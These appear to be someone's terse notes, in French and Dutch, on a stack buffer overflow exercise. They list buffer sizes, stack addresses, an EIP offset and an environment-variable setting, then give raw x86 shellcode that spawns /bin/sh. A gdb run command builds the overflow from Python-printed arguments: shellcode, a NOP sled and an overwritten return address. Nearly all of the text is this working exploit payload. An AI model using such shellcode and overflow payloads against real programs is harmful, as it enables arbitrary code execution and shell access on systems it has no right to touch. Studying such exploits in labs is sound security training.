buffer 1 = 41 octets
buffer 2 = 33 octets
26 octet erase ebp


getenv lang

export LANG=fi

adresse de buff1 = 0xbffff630
adresse de buff2 = 0xbffff658

adresse de strcat = 0xbffff590

Ecrire le shellcode a adresse de strcat + len Goed....

EIP = offset 23

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

r $(python -c 'print("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" + "a" * 50)') $(python -c 'print("\x90" * 18 + "\x50\xf5\xff\xbf" + "a" * 50)')
